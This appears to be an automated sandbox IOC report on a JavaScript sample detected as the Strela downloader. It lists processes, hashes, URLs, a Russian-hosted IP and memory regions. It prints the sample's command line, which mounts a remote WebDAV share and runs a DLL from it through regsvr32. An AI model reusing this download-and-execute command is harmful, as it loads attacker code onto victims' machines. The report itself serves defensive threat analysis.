Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\23276189011851115158.js"

Details

Is windows:	true
Is dropped:	false
PID:	7460
Target ID:	5
Parent PID:	2592
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\23276189011851115158.js"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	01:40:09
Date:	02/12/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6ef680000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected Strela Downloader	Spam, unwanted Advertisements and Ransom Demands
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout 1&&cmd /c net use \\94.159.113.84@8888\davwwwroot\ && cmd /c regsvr32 /s \\94.159.113.84@8888\davwwwroot\98521559926943.dll

Details

Is windows:	true
Is dropped:	false
PID:	7716
Target ID:	7
Parent PID:	7460
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout 1&&cmd /c net use \\94.159.113.84@8888\davwwwroot\ && cmd /c regsvr32 /s \\94.159.113.84@8888\davwwwroot\98521559926943.dll
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	01:40:09
Date:	02/12/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7fe280000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\cmd.exe

cmd /c net use \\94.159.113.84@8888\davwwwroot\

Details

Is windows:	true
Is dropped:	false
PID:	7788
Target ID:	10
Parent PID:	7716
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	cmd /c net use \\94.159.113.84@8888\davwwwroot\
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	01:40:10
Date:	02/12/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7fe280000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\net.exe

net use \\94.159.113.84@8888\davwwwroot\

Details

Is windows:	true
Is dropped:	false
PID:	7804
Target ID:	11
Parent PID:	7788
Name:	net.exe
Path:	C:\Windows\System32\net.exe
Commandline:	net use \\94.159.113.84@8888\davwwwroot\
Size:	59904
MD5:	0BD94A338EEA5A4E1F2830AE326E6D19
Time:	01:40:10
Date:	02/12/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7c59e0000
Modulesize:	122880
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7724
Target ID:	8
Parent PID:	7716
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	01:40:09
Date:	02/12/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff68cce0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\timeout.exe

timeout 1

Details

Is windows:	true
Is dropped:	false
PID:	7772
Target ID:	9
Parent PID:	7716
Name:	timeout.exe
Path:	C:\Windows\System32\timeout.exe
Commandline:	timeout 1
Size:	32768
MD5:	100065E21CFBBDE57CBA2838921F84D6
Time:	01:40:09
Date:	02/12/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7689b0000
Modulesize:	53248
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://94.159.113.84:8888/paceTcy

unknown

http://94.159.113.84:8888/

unknown

Details

Name:	http://94.159.113.84:8888/
TargetID:	11
From Memory:	true
Current Path:	C:\Windows\System32\net.exe
Source:	net.exe, 0000000B.00000002.1306078372.00000279AFB39000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.1306078372.00000279AFB55000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.1306078372.00000279AFB10000.00000004.00000020.00020000.00000000.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

http://94.159.113.84:8888/WH

unknown

http://94.159.113.84:8888/gH

unknown

IPs

Domain

Country

Malicious

94.159.113.84

unknown

Russian Federation

Details

IP:	94.159.113.84
TargetID:	11
Current Path:	C:\Windows\System32\net.exe
Country:	Russian Federation
Countrycode:	RUS
ASN number:	49531
ASN name:	NETCOM-R-ASRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
JScript performs obfuscated calls to suspicious functions	Data Obfuscation	Scripting
Gathers information about network shares	Stealing of Sensitive Information	Network Share Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Sigma detected: Communication To Uncommon Destination Ports	System Summary
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process	System Summary
Connects to IPs without corresponding DNS lookups	Networking
Sigma detected: System Network Connections Discovery Via Net.EXE	System Summary
Sigma detected: Windows Share Mount Via Net.EXE	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe

JScriptSetScriptStateStarted

Memdumps

Base Address

Regiontype

Protect

Malicious

A5EEF8000

stack

page read and write

13BA6E1F000

heap

page read and write

A5F2FE000

stack

page read and write

13BA67A5000

heap

page read and write

13BA6E0D000

heap

page read and write

13BA6E43000

heap

page read and write

13BA6BBD000

heap

page read and write

13BA6E2F000

heap

page read and write

13BA4E1B000

heap

page read and write

AC70C7C000

stack

page read and write

13BA6C00000

heap

page read and write

13BA6E59000

heap

page read and write

13BA6E44000

heap

page read and write

13BA6E59000

heap

page read and write

13BA6E03000

heap

page read and write

13BA6E1C000

heap

page read and write

A5F3FE000

stack

page read and write

13BA6E19000

heap

page read and write

279AFB39000

heap

page read and write

13BA6E05000

heap

page read and write

13BA6E2B000

heap

page read and write

13BA4E10000

heap

page read and write

13BA6EDD000

heap

page read and write

13BA6CD7000

heap

page read and write

A0EAC7E000

stack

page read and write

279AFAB0000

remote allocation

page read and write

13BA66BF000

heap

page read and write

A5F7FE000

stack

page read and write

13BA6E00000

heap

page read and write

13BA66C8000

heap

page read and write

279AFB35000

heap

page read and write

13BA66B2000

heap

page read and write

279AFDB5000

heap

page read and write

13BA6B91000

heap

page read and write

13BA6E4E000

heap

page read and write

13BA6770000

heap

page read and write

A5F6FE000

stack

page read and write

13BA7000000

heap

page read and write

13BA4D3E000

heap

page read and write

A0EA98A000

stack

page read and write

13BA6E74000

heap

page read and write

13BA673C000

heap

page read and write

13BA67B0000

heap

page read and write

279AFB55000

heap

page read and write

13BA6E17000

heap

page read and write

13BA6E03000

heap

page read and write

13BA4E19000

heap

page read and write

13BA6BB5000

heap

page read and write

279AFDB0000

heap

page read and write

13BA6E55000

heap

page read and write

13BA6F0D000

heap

page read and write

279AFB00000

heap

page read and write

13BA6E17000

heap

page read and write

279AFAB0000

remote allocation

page read and write

13BA66B4000

heap

page read and write

2800CFD0000

heap

page read and write

279AFB3F000

heap

page read and write

13BA6E43000

heap

page read and write

2800CFC0000

heap

page read and write

279AFB35000

heap

page read and write

AC70CFE000

stack

page read and write

13BA6E0C000

heap

page read and write

279AFA60000

heap

page read and write

13BA6E4F000

heap

page read and write

A5FBFC000

stack

page read and write

AC70D7F000

stack

page read and write

13BA66BC000

heap

page read and write

279AF960000

heap

page read and write

13BA66D8000

heap

page read and write

279AFB6D000

heap

page read and write

A0EACFE000

stack

page read and write

13BA4C70000

heap

page read and write

2800EA55000

heap

page read and write

2800D000000

heap

page read and write

13BA4D0F000

heap

page read and write

279AFB67000

heap

page read and write

13BA66B1000

heap

page read and write

13BA6E17000

heap

page read and write

13BA6E36000

heap

page read and write

13BA66FC000

heap

page read and write

13BA66B3000

heap

page read and write

A5F5FF000

stack

page read and write

13BA6E39000

heap

page read and write

13BA6E0A000

heap

page read and write

13BA4E1B000

heap

page read and write

279AFB10000

heap

page read and write

13BA6E4E000

heap

page read and write

2800E980000

heap

page read and write

13BA6B00000

heap

page read and write

13BA6EB1000

heap

page read and write

13BA6E36000

heap

page read and write

13BA6E14000

heap

page read and write

13BA6E13000

heap

page read and write

13BA6E01000

heap

page read and write

A0EADFC000

stack

page read and write

13BA7001000

heap

page read and write

13BA6E5D000

heap

page read and write

13BA66E8000

heap

page read and write

13BA4AA0000

heap

page read and write

13BA4C40000

heap

page read and write

13BA4C49000

heap

page read and write

13BA6E4E000

heap

page read and write

279AFB2D000

heap

page read and write

A5F8FE000

stack

page read and write

13BA6E1D000

heap

page read and write

13BA4B80000

heap

page read and write

13BA4D2D000

heap

page read and write

279AFB07000

heap

page read and write

13BA6E74000

heap

page read and write

13BA6E0A000

heap

page read and write

13BA6E75000

heap

page read and write

13BA6E19000

heap

page read and write

279AFB36000

heap

page read and write

13BA6E74000

heap

page read and write

13BA6E74000

heap

page read and write

279AFA40000

heap

page read and write

13BA66B6000

heap

page read and write

13BA70C0000

heap

page read and write

279AFAB0000

remote allocation

page read and write

13BA6E17000

heap

page read and write

13BA6E74000

heap

page read and write

2800EA50000

heap

page read and write

13BA6E1A000

heap

page read and write

A0EAD7E000

stack

page read and write

13BA6E74000

heap

page read and write

13BA4C82000

heap

page read and write

279AFB2E000

heap

page read and write

13BA6BBC000

heap

page read and write

13BA6E89000

heap

page read and write

13BA6754000

heap

page read and write

13BA6E22000

heap

page read and write

13BA6F41000

heap

page read and write

13BA6E03000

heap

page read and write

13BA6724000

heap

page read and write

13BA6789000

heap

page read and write

13BA6E07000

heap

page read and write

13BA4E1C000

heap

page read and write

13BA4E15000

heap

page read and write

2800D009000

heap

page read and write

13BA6E09000

heap

page read and write

13BA4BA0000

heap

page read and write

279AFB33000

heap

page read and write

13BA4D3E000

heap

page read and write

13BA6E08000

heap

page read and write

13BA6E01000

heap

page read and write

13BA4D2E000

heap

page read and write

13BA66B0000

heap

page read and write

13BA4E1D000

heap

page read and write

13BA6E12000

heap

page read and write

13BA6710000

heap

page read and write

A0EAE7F000

stack

page read and write

13BA4D3E000

heap

page read and write

A5F9FE000

stack

page read and write

There are 143 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
23276189011851115158.js

Processes

URLs

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report23276189011851115158.js

Processes

URLs

IPs

Registry

Memdumps

IOC Report
23276189011851115158.js